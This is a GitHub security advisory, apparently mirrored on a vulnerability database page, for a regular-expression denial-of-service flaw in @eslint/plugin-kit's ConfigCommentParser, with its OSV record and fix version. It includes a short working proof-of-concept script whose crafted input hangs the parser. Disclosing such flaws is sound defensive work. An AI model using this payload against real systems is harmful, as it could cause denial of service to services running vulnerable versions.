GHSA-XFFM-G5W8-QVG7
Vulnerability from github – Published: 2025-07-18 20:39 – Updated: 2025-07-28 17:34
VLAI
Summary
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
Details
Summary
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
Details
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
PoC
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will stuck forever with high CPU usage
Impact
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.
Severity
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@eslint/plugin-kit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-18T20:39:12Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "### Summary\n\nThe `ConfigCommentParser#parseJSONLikeConfig` API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.\n\n### Details\n\nThe regular expression at [packages/plugin-kit/src/config-comment-parser.js:158](https://github.com/eslint/rewrite/blob/bd4bf23c59f0e4886df671cdebd5abaeb1e0d916/packages/plugin-kit/src/config-comment-parser.js#L158) is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with `[^-a-zA-Z0-9/]`.\n\n### PoC\n\n```javascript\nconst { ConfigCommentParser } = require(\"@eslint/plugin-kit\");\n\nconst str = `${\"A\".repeat(1000000)}?: 1 B: 2`;\n\nconsole.log(\"start\")\nvar parser = new ConfigCommentParser();\nconsole.log(parser.parseJSONLikeConfig(str));\nconsole.log(\"end\")\n\n// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`\n// then the program will stuck forever with high CPU usage\n```\n\n### Impact\n\nThis is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.",
"id": "GHSA-xffm-g5w8-qvg7",
"modified": "2025-07-28T17:34:44Z",
"published": "2025-07-18T20:39:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/eslint/rewrite/security/advisories/GHSA-xffm-g5w8-qvg7"
},
{
"type": "WEB",
"url": "https://github.com/eslint/rewrite/commit/b283f64099ad6c6b5043387c091691d21b387805"
},
{
"type": "PACKAGE",
"url": "https://github.com/eslint/rewrite"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…